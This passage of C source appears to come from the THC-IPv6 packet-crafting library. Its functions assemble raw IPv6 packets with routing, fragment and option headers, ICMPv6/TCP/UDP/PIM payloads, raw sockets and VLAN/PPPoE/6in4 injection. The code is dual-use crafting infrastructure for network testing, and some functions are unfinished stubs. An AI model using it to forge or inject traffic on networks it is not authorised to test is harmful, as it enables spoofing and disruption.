free(nehdr); return -1; } memset(buf, 0, i * 16 + 2 + 4); buf[1] = routerptr; // byte 0 = type; byte 2 reserved; bytes 3-5: loose source routing for (j = 0; j < i; j++) memcpy(buf + 6 + j * 16, routers[j], 16); nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf; nehdr->data_len = i * 16 + 2 + 4; nehdr->length = i * 2; hdr->length += nehdr->data_len + 2; *pkt_len += nehdr->data_len + 2; if (i > 0 && routerptr > 0) hdr->final_dst = nehdr->data + 6 + (i - 1) * 16; return 0; } int thc_add_hdr_mobileroute(unsigned char *pkt, int *pkt_len, unsigned char *dst) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf; if (nehdr == NULL || hdr == NULL) { free(nehdr); return -1; } if (ehdr == NULL) { hdr->next = NXT_ROUTE; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_ROUTE; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_ROUTE; if ((buf = malloc(16 + 2 + 4)) == NULL) { free(nehdr); return -1; } memset(buf, 0, 16 + 2 + 4); // byte 0 = type; 1 = routers to do; byte 2 reserved; bytes 3-5: loose source routing buf[0] = 2; buf[1] = 1; memcpy(buf + 6, dst, 16); nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf; nehdr->data_len = 16 + 2 + 4; nehdr->length = 2; hdr->length += nehdr->data_len + 2; *pkt_len += nehdr->data_len + 2; hdr->final_dst = nehdr->data + 6; return 0; } int thc_add_hdr_oneshotfragment(unsigned char *pkt, int *pkt_len, unsigned int id) { unsigned char buf[6]; int pid; memset(buf, 0, sizeof(buf)); if (id == 0) { pid = getpid(); memcpy(buf + 2, (char *) &pid + _TAKE4, 4); buf[4] = 0xb0; buf[5] = 0x0b; } else memcpy(buf + 2, (char *) &id + _TAKE4, 4); return thc_add_hdr_misc(pkt, pkt_len, NXT_FRAG, -1, buf, sizeof(buf)); } int thc_add_hdr_fragment(unsigned char *pkt, int *pkt_len, int offset, char more_frags, unsigned int id) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf = malloc(6); int coffset = (offset > 8191 ? 8191 : offset) << 3; if (offset > 8191) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: fragment offset can not be larger than 8191 (2^13 - 1)\n"); free(nehdr); free(buf); return -1; } if (nehdr == NULL || hdr == NULL || buf == NULL) { free(nehdr); free(buf); return -1; } if (ehdr == NULL) { hdr->next = NXT_FRAG; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_FRAG; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_FRAG; if (more_frags) coffset++; memset(buf, 0, 6); buf[0] = coffset / 256; buf[1] = coffset % 256; buf[2] = id / 16777216; buf[3] = (id % 16777216) / 65536; buf[4] = (id % 65536) / 256; buf[5] = id % 256; nehdr->next_segment = NULL; nehdr->next = NXT_NONXT; nehdr->data = buf; nehdr->data_len = 6; nehdr->length = (nehdr->data_len + 1) / 8; hdr->length += nehdr->data_len + 2; *pkt_len += nehdr->data_len + 2; return 0; } int thc_add_hdr_dst(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen) { return thc_add_hdr_misc(pkt, pkt_len, NXT_OPTS, -1, buf, buflen); } int thc_add_hdr_hopbyhop(unsigned char *pkt, int *pkt_len, unsigned char *buf, int buflen) { return thc_add_hdr_misc(pkt, pkt_len, NXT_HDR, -1, buf, buflen); } int thc_add_hdr_nonxt(unsigned char *pkt, int *pkt_len, int hdropt) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; if (hdr->final_type == NXT_NONXT) { // nothing to be done, its the default } else { switch (hdr->final_type) { case NXT_IP6: case NXT_HDR: case NXT_ROUTE: case NXT_FRAG: case NXT_OPTS: case NXT_ESP: case NXT_AH: // nothing to be done as its the default break; default: if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: Not possible to attach a no-next-header attribute if the last header is a icmp/tcp/udp/data segment\n"); } } return 0; } int thc_add_icmp6(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, int checksum) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_icmp6_hdr *ihdr = malloc(sizeof(thc_icmp6_hdr)); thc_ipv6_ext_hdr *ehdr; if (ihdr == NULL) return -1; memset(ihdr, 0, sizeof(thc_icmp6_hdr)); if (hdr->final != NULL) { ehdr = (thc_ipv6_ext_hdr *) hdr->final; ehdr->next_segment = (char *) ihdr; ehdr->next = NXT_ICMP6; } else { hdr->next_segment = (char *) ihdr; hdr->next = NXT_ICMP6; } hdr->final = (char *) ihdr; hdr->final_type = NXT_ICMP6; ihdr->type = type; ihdr->code = code; ihdr->flags = flags; if (checksum == 0) { ihdr->checksum = DO_CHECKSUM; } else ihdr->checksum = checksum; if (data_len > 0 && data != NULL) { if ((ihdr->data = malloc(data_len)) == NULL) return -1; ihdr->data_len = data_len; memcpy(ihdr->data, data, data_len); } else { ihdr->data = NULL; ihdr->data_len = 0; } hdr->length += data_len + 8; *pkt_len += data_len + 8; return 0; } int thc_add_tcp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int sequence, unsigned int ack, unsigned char flags, unsigned short int window, unsigned short int urgent, char *option, int option_len, char *data, int data_len) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_tcp_hdr *ihdr = malloc(sizeof(thc_tcp_hdr)); thc_ipv6_ext_hdr *ehdr; int i = option_len; if (ihdr == NULL) return -1; memset(ihdr, 0, sizeof(thc_tcp_hdr)); if (hdr->final != NULL) { ehdr = (thc_ipv6_ext_hdr *) hdr->final; ehdr->next_segment = (char *) ihdr; ehdr->next = NXT_TCP; } else { hdr->next_segment = (char *) ihdr; hdr->next = NXT_TCP; } hdr->final = (char *) ihdr; hdr->final_type = NXT_TCP; ihdr->sport = sport; ihdr->dport = dport; ihdr->sequence = sequence; ihdr->ack = ack; ihdr->flags = flags; ihdr->window = window; ihdr->urgent = urgent; // if (checksum == 0) { ihdr->checksum = DO_CHECKSUM; // } else // ihdr->checksum = checksum; if (data_len > 0 && data != NULL) { ihdr->data = malloc(data_len); ihdr->data_len = data_len; memcpy(ihdr->data, data, data_len); } else { ihdr->data = NULL; ihdr->data_len = 0; } if (option_len > 0 && option != NULL) { if ((i = option_len) % 4 > 0) option_len = (((option_len / 4) + 1) * 4); ihdr->option = malloc(option_len); ihdr->option_len = option_len; memcpy(ihdr->option, option, i); } else { ihdr->option = NULL; ihdr->option_len = 0; } i = (20 + option_len) / 4; ihdr->length = ((i % 16) * 16) + (i / 16); hdr->length += data_len + 20 + option_len; *pkt_len += data_len + 20 + option_len; return 0; } int thc_add_udp(unsigned char *pkt, int *pkt_len, unsigned short int sport, unsigned short int dport, unsigned int checksum, char *data, int data_len) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_udp_hdr *ihdr = malloc(sizeof(thc_udp_hdr)); thc_ipv6_ext_hdr *ehdr; if (ihdr == NULL) return -1; memset(ihdr, 0, sizeof(thc_udp_hdr)); if (hdr->final != NULL) { ehdr = (thc_ipv6_ext_hdr *) hdr->final; ehdr->next_segment = (char *) ihdr; ehdr->next = NXT_UDP; } else { hdr->next_segment = (char *) ihdr; hdr->next = NXT_UDP; } hdr->final = (char *) ihdr; hdr->final_type = NXT_UDP; ihdr->sport = sport; ihdr->dport = dport; if (checksum == 0) { ihdr->checksum = DO_CHECKSUM; } else ihdr->checksum = checksum; if (data_len > 0 && data != NULL) { ihdr->data = malloc(data_len); ihdr->data_len = data_len; memcpy(ihdr->data, data, data_len); } else { ihdr->data = NULL; ihdr->data_len = 0; } ihdr->length = data_len + 8; hdr->length += data_len + 8; *pkt_len += data_len + 8; return 0; } int thc_add_pim(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf = malloc(data_len + 4); if (nehdr == NULL || hdr == NULL || buf == NULL) { free(nehdr); free(buf); return -1; } if (ehdr == NULL) { hdr->next = NXT_PIM; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_PIM; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_PIM; memset(buf, 0, sizeof(buf)); buf[0] = type; if (type < 16) buf[0] += 32; // ensure we set a PIM version (here: v2) // byte 1: reserved, 2+3: checksum memcpy(buf + 4, data, data_len); nehdr->next_segment = NULL; nehdr->next = type; nehdr->data = buf; nehdr->data_len = data_len + 4; hdr->length += data_len + 4; *pkt_len += data_len + 4; return 0; } int thc_add_data6(unsigned char *pkt, int *pkt_len, unsigned char type, unsigned char *data, int data_len) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr = (thc_ipv6_ext_hdr *) hdr->final, *nehdr = malloc(sizeof(thc_ipv6_ext_hdr)); unsigned char *buf = malloc(data_len); if (nehdr == NULL || hdr == NULL || buf == NULL) { free(nehdr); free(buf); return -1; } if (ehdr == NULL) { hdr->next = NXT_DATA; hdr->next_segment = (char *) nehdr; } else { ehdr->next = NXT_DATA; ehdr->next_segment = (char *) nehdr; } hdr->final = (char *) nehdr; hdr->final_type = NXT_DATA; memset(buf, 0, sizeof(buf)); memcpy(buf, data, data_len); nehdr->next_segment = NULL; nehdr->next = type; nehdr->data = buf; nehdr->data_len = data_len; hdr->length += data_len; *pkt_len += data_len; return 0; } int thc_open_ipv6() { char *ptr, *ptr2, tbuf[6], vbuf[4]; int i = 0; struct sockaddr_in servaddr; if (thc_socket >= 0) return thc_socket; if ((ptr = getenv("THC_IPV6_VLAN")) != NULL && strlen(ptr) > 0) { ptr = strdup(ptr); ptr2 = ptr; i = 0; while ((ptr2 = index(ptr2, ',')) != NULL) { i++; ptr2++; } if (i != 2) { fprintf(stderr, "Error: wrong Syntax in THC_IPV6_VLAN variable: source_mac,dst_mac,vlan_id - e.g. 01:02:03:04:05:06,07:08:09:a0:a1:a2,7\n"); exit(-1); } ptr2 = strtok(ptr, ","); ptr2 = strtok(NULL, ","); ptr2 = strtok(NULL, ","); i = atoi(ptr2); if (strlen(ptr) < 1 || i < 0 || i > 4097 || (i == 0 && ptr[0] != '0')) { fprintf(stderr, "Error: wrong Syntax in THC_IPV6_VLAN variable: srcmac,dstmac,vlan-id - e.g. 01:02:03:04:05:06,1a:1b:1c:1d:1e:1f,7\n"); exit(-1); } vbuf[0] = 0x81; vbuf[1] = 0x00; vbuf[2] = i / 256; vbuf[3] = i % 256; do_hdr_vlan = 1; do_hdr_off = 4; free(ptr); printf("Information: VLAN injection/sniffing activated\n"); } if ((ptr = getenv("THC_IPV6_PPPOE")) != NULL && strlen(ptr) > 0) { i = 0; do_pppoe = 1; do_hdr_size = _PPPOE_HDR_SIZE + do_hdr_off; if ((do_hdr = malloc(64)) == NULL || (do_capture = malloc(64)) == NULL) { fprintf(stderr, "Error: could not allocate necessary memory\n"); exit(-1); } ptr2 = ptr; while ((ptr2 = index(ptr2, ',')) != NULL) { i++; ptr2++; } if (i != 2) { fprintf(stderr, "Error: wrong Syntax in THC_IPV6_PPPOE variable: source_mac,dst_mac,ppoe_session_id - e.g. 01:02:03:04:05:06,07:08:09:a0:a1:a2,a1b2\n"); exit(-1); } ptr2 = strtok(ptr, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[6], (unsigned int *) &do_hdr[7], (unsigned int *) &do_hdr[8], (unsigned int *) &do_hdr[9], (unsigned int *) &do_hdr[10], (unsigned int *) &do_hdr[11]); memcpy(tbuf, do_hdr + 6, 6); ptr2 = strtok(NULL, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[0], (unsigned int *) &do_hdr[1], (unsigned int *) &do_hdr[2], (unsigned int *) &do_hdr[3], (unsigned int *) &do_hdr[4], (unsigned int *) &do_hdr[5]); memcpy(do_hdr + 6, tbuf, 6); if (do_hdr_vlan) sprintf(do_capture, /*"ether proto 0x8100 and */"ether src %18s", ptr2); else sprintf(do_capture, /*"ether proto 0x8864 and */"ether src %18s", ptr2); if (do_hdr_vlan) memcpy(do_hdr + 12, vbuf, 4); do_hdr[12 + do_hdr_off] = 0x88; do_hdr[13 + do_hdr_off] = 0x64; // PPPoE Header do_hdr[14 + do_hdr_off] = 0x11; do_hdr[15 + do_hdr_off] = 0; ptr2 = strtok(NULL, ","); if (strlen(ptr2) != 4) { fprintf(stderr, "Error: PPPoE session ID must be hexadecimal and a length of four, e.g. 0a1f\n"); exit(-1); } tbuf[0] = ptr2[0]; tbuf[1] = ptr2[1]; tbuf[2] = 0; sscanf(tbuf, "%x", (unsigned int *) &do_hdr[16 + do_hdr_off]); tbuf[0] = ptr2[2]; tbuf[1] = ptr2[3]; sscanf(tbuf, "%x", (unsigned int *) &do_hdr[17 + do_hdr_off]); // 2 bytes length: 18+19 do_hdr[20 + do_hdr_off] = 0x00; do_hdr[21 + do_hdr_off] = 0x57; if (debug) thc_dump_data(do_hdr, do_hdr_size + do_hdr_off, "PPPoE Header"); // if (/*verbose &&*/ _thc_ipv6_showerrors) printf("Information: PPPoE injection/sniffing activated\n"); } else if ((ptr = getenv("THC_IPV6_6IN4")) != NULL && strlen(ptr) > 0) { do_6in4 = 1; do_hdr_size = _6IN4_HDR_SIZE + do_hdr_off; if ((do_hdr = malloc(64)) == NULL || (do_capture = malloc(64)) == NULL) { fprintf(stderr, "Error: could not allocate necessary memory\n"); exit(-1); } ptr2 = ptr; while ((ptr2 = index(ptr2, ',')) != NULL) { i++; ptr2++; } if (i != 3) { fprintf(stderr, "Error: wrong Syntax in THC_IPV6_6IN4 variable: source_mac,dst_mac,src_ip,dst_ip - e.g. 01:02:03:04:05:06,07:08:09:a0:a1:a2,1.1.1.1,2.2.2.2\n"); exit(-1); } ptr2 = strtok(ptr, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[6], (unsigned int *) &do_hdr[7], (unsigned int *) &do_hdr[8], (unsigned int *) &do_hdr[9], (unsigned int *) &do_hdr[10], (unsigned int *) &do_hdr[11]); memcpy(tbuf, do_hdr + 6, 6); ptr2 = strtok(NULL, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[0], (unsigned int *) &do_hdr[1], (unsigned int *) &do_hdr[2], (unsigned int *) &do_hdr[3], (unsigned int *) &do_hdr[4], (unsigned int *) &do_hdr[5]); memcpy(do_hdr + 6, tbuf, 6); if (do_hdr_vlan) memcpy(do_hdr + 12, vbuf, 4); do_hdr[12 + do_hdr_off] = 8; do_hdr[13 + do_hdr_off] = 0; // IPv4 Hdr do_hdr[14 + do_hdr_off] = 0x45; do_hdr[15 + do_hdr_off] = 0; // 2 bytes length: 16+17 do_hdr[18 + do_hdr_off] = 0; do_hdr[19 + do_hdr_off] = 0; do_hdr[20 + do_hdr_off] = 0; do_hdr[21 + do_hdr_off] = 0; do_hdr[22 + do_hdr_off] = 64; do_hdr[23 + do_hdr_off] = 41; // proto ipv6 do_hdr[24 + do_hdr_off] = 0; do_hdr[25 + do_hdr_off] = 0; // hdr chksum: 24+25 ptr2 = strtok(NULL, ","); if (inet_pton(AF_INET, ptr2, &servaddr.sin_addr) != 1) { fprintf(stderr, "Error: 6in4: not a valid IPv4 address: %s\n", ptr2); exit(-1); } memcpy(do_hdr + 26 + do_hdr_off, &servaddr.sin_addr, 4); ptr2 = strtok(NULL, ","); if (inet_pton(AF_INET, ptr2, &servaddr.sin_addr) != 1) { fprintf(stderr, "Error: 6in4: not a valid IPv4 address: %s\n", ptr2); exit(-1); } memcpy(do_hdr + 30 + do_hdr_off, &servaddr.sin_addr, 4); if (do_hdr_vlan) sprintf(do_capture, /*"ether proto 0x8100 and */"ether src %18s", ptr2); else sprintf(do_capture, "ip proto 41 and src %16s", ptr2); if (debug) thc_dump_data(do_hdr, do_hdr_size, "6in4 Header"); // if (/*verbose &&*/ _thc_ipv6_showerrors) printf("Information: 6in4 injection/sniffin activated\n"); } if (do_hdr_vlan == 1 && do_6in4 == 0 && do_pppoe == 0) { do_hdr_size = 14 + do_hdr_off; if ((do_hdr = malloc(64)) == NULL || (do_capture = malloc(64)) == NULL) { fprintf(stderr, "Error: could not allocate necessary memory\n"); exit(-1); } ptr = getenv("THC_IPV6_VLAN"); ptr2 = strtok(ptr, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[6], (unsigned int *) &do_hdr[7], (unsigned int *) &do_hdr[8], (unsigned int *) &do_hdr[9], (unsigned int *) &do_hdr[10], (unsigned int *) &do_hdr[11]); memcpy(tbuf, do_hdr + 6, 6); ptr2 = strtok(NULL, ","); sscanf(ptr2, "%x:%x:%x:%x:%x:%x", (unsigned int *) &do_hdr[0], (unsigned int *) &do_hdr[1], (unsigned int *) &do_hdr[2], (unsigned int *) &do_hdr[3], (unsigned int *) &do_hdr[4], (unsigned int *) &do_hdr[5]); memcpy(do_hdr + 6, tbuf, 6); memcpy(do_hdr + 12, vbuf, 4); do_hdr[16] = 0x86; do_hdr[17] = 0xdd; sprintf(do_capture, /*"ether proto 0x8100 and */"ether src %18s", ptr2); } if (_thc_ipv6_rawmode) return socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_ALL)); // XXX BUG TODO FIXME : no this is not working. else return socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP)); } int thc_generate_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr; thc_icmp6_hdr *ihdr; thc_tcp_hdr *thdr; thc_udp_hdr *uhdr; char *next, *mysrcmac = NULL, *mydstmac = NULL, *last_type, *checksum_src; int type, bufptr, do_checksum = 0, offset = 0, i, is_ip4 = 0; if (pkt == NULL || hdr->pkt != NULL || (hdr->pkt = malloc(*pkt_len + 14 + do_hdr_size + 64)) == NULL) return -1; hdr->pkt_len = *pkt_len; if (interface == NULL) interface = default_interface; if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (_thc_ipv6_rawmode == 0) { if (do_pppoe || do_6in4 || do_hdr_vlan) { if (do_pppoe) { memcpy(&hdr->pkt[0], do_hdr, do_hdr_size); hdr->pkt[18 + do_hdr_off] = (*pkt_len + 2) / 256; hdr->pkt[19 + do_hdr_off] = (*pkt_len + 2) % 256; } else if (do_6in4) { // 6in4 do_hdr[16 + do_hdr_off] = (*pkt_len + 20) / 256; do_hdr[17 + do_hdr_off] = (*pkt_len + 20) % 256; // hdrchecksum i = calculate_checksum(do_hdr + 14 + do_hdr_off, 20); memcpy(&hdr->pkt[0], do_hdr, do_hdr_size); hdr->pkt[24 + do_hdr_off] = i / 256; hdr->pkt[25 + do_hdr_off] = i % 256; } else { memcpy(&hdr->pkt[0], do_hdr, do_hdr_size); } offset += do_hdr_size; hdr->pkt_len += offset; *pkt_len += offset; } else { offset += 14; hdr->pkt_len += offset; *pkt_len += offset; if (srcmac == NULL) mysrcmac = thc_get_own_mac(interface); else mysrcmac = srcmac; if (dstmac == NULL) mydstmac = thc_get_mac(interface, hdr->src, hdr->dst); else mydstmac = dstmac; if (mysrcmac == NULL || mydstmac == NULL) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: could not get target MAC address\n"); if (mysrcmac != NULL && srcmac == NULL) free(mysrcmac); if (mydstmac != NULL && dstmac == NULL) free(mydstmac); return -1; } memset(hdr->pkt, 0, *pkt_len); memcpy(&hdr->pkt[0], mydstmac, 6); memcpy(&hdr->pkt[6], mysrcmac, 6); hdr->pkt[12] = IPV6_FRAME_TYPE / 256; hdr->pkt[13] = IPV6_FRAME_TYPE % 256; } } hdr->pkt[0 + offset] = ((hdr->version % 16) << 4) | (hdr->class / 16); hdr->pkt[1 + offset] = ((hdr->class % 16) << 4) | ((hdr->label % 1048576) / 65536); hdr->pkt[2 + offset] = (hdr->label % 65536) / 256; hdr->pkt[3 + offset] = hdr->label % 256; hdr->pkt[4 + offset] = hdr->length / 256; hdr->pkt[5 + offset] = hdr->length % 256; if (hdr->next != NXT_IP4_RUDIMENTARY) hdr->pkt[6 + offset] = hdr->next; else hdr->pkt[6 + offset] = NXT_IP4; last_type = &hdr->pkt[7 + offset]; hdr->pkt[7 + offset] = hdr->ttl; memcpy(&hdr->pkt[8 + offset], hdr->src, 16); memcpy(&hdr->pkt[24 + offset], hdr->dst, 16); next = hdr->next_segment; type = hdr->next; bufptr = 40 + offset; checksum_src = hdr->original_src; // here go extension headers (not icmp6, tcp, udp, pim, etc.) // BUT ipv4 yes, but not IP4_RUDIMENTARY while (type == NXT_HDR || type == NXT_ROUTE || type == NXT_FRAG || type == NXT_OPTS || type == NXT_INVALID || type == NXT_IGNORE || type == NXT_AH || type == NXT_ESP || type == NXT_IP4 || type == NXT_IP6) { if (type != NXT_IP4 && type != NXT_IP6) { ehdr = (thc_ipv6_ext_hdr *) next; if (ehdr->next != NXT_IP4_RUDIMENTARY) hdr->pkt[bufptr] = ehdr->next; else hdr->pkt[bufptr] = NXT_IP4; hdr->pkt[bufptr + 1] = ehdr->length; last_type = &hdr->pkt[bufptr]; if (ehdr->data != NULL && ehdr->data_len > 0) { memcpy(&hdr->pkt[bufptr + 2], ehdr->data, ehdr->data_len); if (type == NXT_OPTS && hdr->pkt[bufptr + 2] == 0xc9) { // mobile home address option checksum_src = &hdr->pkt[bufptr + 4]; } } bufptr += 2 + ehdr->data_len; next = ehdr->next_segment; type = ehdr->next; } else { if (type == NXT_IP4) { is_ip4 = bufptr; printf(""); // to be filled XXX TODO FIXME } else if (type == NXT_IP6) { printf(""); // to be filled XXX TODO FIXME } } } // now the rest of protocols that are final destinations switch (type) { case NXT_NONXT: break; case NXT_PIM: ehdr = (thc_ipv6_ext_hdr *) next; memcpy(&hdr->pkt[bufptr], ehdr->data, ehdr->data_len); hdr->pkt[bufptr + 2] = 0; hdr->pkt[bufptr + 3] = 0; do_checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_PIM, &hdr->pkt[bufptr], ehdr->data_len); hdr->pkt[bufptr + 2] = do_checksum / 256; hdr->pkt[bufptr + 3] = do_checksum % 256; bufptr += ehdr->data_len; break; case NXT_ICMP6: ihdr = (thc_icmp6_hdr *) next; if (ihdr->checksum == DO_CHECKSUM) { ihdr->checksum = 0; do_checksum = 1; } hdr->pkt[bufptr] = ihdr->type; hdr->pkt[bufptr + 1] = ihdr->code; hdr->pkt[bufptr + 2] = ihdr->checksum / 256; hdr->pkt[bufptr + 3] = ihdr->checksum % 256; hdr->pkt[bufptr + 4] = ihdr->flags / 16777216; hdr->pkt[bufptr + 5] = (ihdr->flags % 16777216) / 65536; hdr->pkt[bufptr + 6] = (ihdr->flags % 65536) / 256; hdr->pkt[bufptr + 7] = ihdr->flags % 256; if (ihdr->data != NULL && ihdr->data_len > 0) memcpy(&hdr->pkt[bufptr + 8], ihdr->data, ihdr->data_len); if (do_checksum) { //memcpy( hdr->final_dst, hdr->pkt + 38, 16); ihdr->checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[bufptr], 8 + ihdr->data_len); /* printf("\n"); thc_dump_data((unsigned char *)hdr->pkt + 22, 16,"packet source"); thc_dump_data((unsigned char *)checksum_src, 16, "original source"); thc_dump_data((unsigned char *)hdr->final_dst, 16, "final destination"); thc_dump_data((unsigned char *)hdr->pkt + 38, 16, "pkt destination"); printf("\n"); */ hdr->pkt[bufptr + 2] = ihdr->checksum / 256; hdr->pkt[bufptr + 3] = ihdr->checksum % 256; do_checksum = 0; } bufptr += 8 + ihdr->data_len; break; case NXT_TCP: thdr = (thc_tcp_hdr *) next; if (thdr->checksum == DO_CHECKSUM) { thdr->checksum = 0; do_checksum = 1; } hdr->pkt[bufptr] = thdr->sport / 256; hdr->pkt[bufptr + 1] = thdr->sport % 256; hdr->pkt[bufptr + 2] = thdr->dport / 256; hdr->pkt[bufptr + 3] = thdr->dport % 256; hdr->pkt[bufptr + 4] = thdr->sequence / 16777216; hdr->pkt[bufptr + 5] = (thdr->sequence % 16777216) / 65536; hdr->pkt[bufptr + 6] = (thdr->sequence % 65536) / 256; hdr->pkt[bufptr + 7] = thdr->sequence % 256; hdr->pkt[bufptr + 8] = thdr->ack / 16777216; hdr->pkt[bufptr + 9] = (thdr->ack % 16777216) / 65536; hdr->pkt[bufptr + 10] = (thdr->ack % 65536) / 256; hdr->pkt[bufptr + 11] = thdr->ack % 256; hdr->pkt[bufptr + 12] = thdr->length; hdr->pkt[bufptr + 13] = thdr->flags; hdr->pkt[bufptr + 14] = thdr->window % 256; hdr->pkt[bufptr + 15] = thdr->window / 256; hdr->pkt[bufptr + 18] = thdr->urgent % 256; hdr->pkt[bufptr + 19] = thdr->urgent / 256; if (thdr->option != NULL && thdr->option_len > 0) memcpy(&hdr->pkt[bufptr + 20], thdr->option, thdr->option_len); if (thdr->data != NULL && thdr->data_len > 0) memcpy(&hdr->pkt[bufptr + 20 + thdr->option_len], thdr->data, thdr->data_len); if (do_checksum) { //memcpy( hdr->final_dst, hdr->pkt + 38, 16); thdr->checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_TCP, &hdr->pkt[bufptr], 20 + thdr->option_len + thdr->data_len); /* printf("\n"); thc_dump_data((unsigned char *)hdr->pkt + 22, 16,"packet source"); thc_dump_data((unsigned char *)checksum_src, 16, "original source"); thc_dump_data((unsigned char *)hdr->final_dst, 16, "final destination"); thc_dump_data((unsigned char *)hdr->pkt + 38, 16, "pkt destination"); printf("\n"); */ hdr->pkt[bufptr + 16] = thdr->checksum / 256; hdr->pkt[bufptr + 17] = thdr->checksum % 256; do_checksum = 0; } bufptr += 20 + thdr->option_len + thdr->data_len; break; case NXT_IP4_RUDIMENTARY: memcpy(hdr->pkt + bufptr, next, THC_IPv4_RUDIMENTARY_LEN); bufptr += THC_IPv4_RUDIMENTARY_LEN; break; case NXT_UDP: uhdr = (thc_udp_hdr *) next; if (uhdr->checksum == DO_CHECKSUM) { uhdr->checksum = 0; do_checksum = 1; } hdr->pkt[bufptr] = uhdr->sport / 256; hdr->pkt[bufptr + 1] = uhdr->sport % 256; hdr->pkt[bufptr + 2] = uhdr->dport / 256; hdr->pkt[bufptr + 3] = uhdr->dport % 256; hdr->pkt[bufptr + 4] = uhdr->length / 256; hdr->pkt[bufptr + 5] = uhdr->length % 256; if (uhdr->data != NULL && uhdr->data_len > 0) memcpy(&hdr->pkt[bufptr + 8], uhdr->data, uhdr->data_len); if (do_checksum) { //memcpy( hdr->final_dst, hdr->pkt + 38, 16); uhdr->checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_UDP, &hdr->pkt[bufptr], 8 + uhdr->data_len); /* printf("\n"); thc_dump_data((unsigned char *)hdr->pkt + 22, 16,"packet source"); thc_dump_data((unsigned char *)checksum_src, 16, "original source"); thc_dump_data((unsigned char *)hdr->final_dst, 16, "final destination"); thc_dump_data((unsigned char *)hdr->pkt + 38, 16, "pkt destination"); printf("\n"); */ hdr->pkt[bufptr + 6] = uhdr->checksum / 256; hdr->pkt[bufptr + 7] = uhdr->checksum % 256; do_checksum = 0; } bufptr += 8 + uhdr->data_len; break; case NXT_DATA: ehdr = (thc_ipv6_ext_hdr *) next; memcpy(&hdr->pkt[bufptr], ehdr->data, ehdr->data_len); if (ehdr->next == NXT_MIPV6) { do_checksum = checksum_pseudo_header(checksum_src, hdr->final_dst, NXT_MIPV6, &hdr->pkt[bufptr], ehdr->data_len); hdr->pkt[bufptr + 4] = do_checksum / 256; hdr->pkt[bufptr + 5] = do_checksum % 256; } bufptr += ehdr->data_len; *last_type = ehdr->next; break; // XXX TODO FIXME: other protocols default: if (_thc_ipv6_showerrors) fprintf(stderr, "Error: Data packet type %d not implemented!\n", type); if (srcmac == NULL) free(mysrcmac); if (dstmac == NULL) free(mydstmac); return -1; } if (bufptr != *pkt_len) if (_thc_ipv6_showerrors) fprintf(stderr, "Warning: packet size mismatch (%d != %d)!\n", *pkt_len, bufptr); if (debug) thc_dump_data(hdr->pkt, *pkt_len, "Generated Packet"); if (srcmac == NULL && mysrcmac != NULL) free(mysrcmac); if (dstmac == NULL && mydstmac != NULL) free(mydstmac); if (debug) printf("Returning from thc_generate_pkt()\n"); return 0; } int thc_send_pkt(char *interface, unsigned char *pkt, int *pkt_len) { struct sockaddr sa; thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; if (pkt == NULL || hdr->pkt == NULL || hdr->pkt_len < 1 || hdr->pkt_len > 65535) return -2; if (interface == NULL) interface = default_interface; strcpy(sa.sa_data, interface); if (thc_socket < 0) thc_socket = thc_open_ipv6(); if (thc_socket < 0 && geteuid() != 0) { fprintf(stderr, "Error: Program must be run as root.\n"); exit(-1); } if (debug) thc_dump_data(hdr->pkt, hdr->pkt_len, "Sent Packet"); if ((_thc_ipv6_rawmode > 0 && hdr->pkt_len > thc_get_mtu(interface)) || (_thc_ipv6_rawmode == 0 && hdr->pkt_len > thc_get_mtu(interface) + 14)) { if 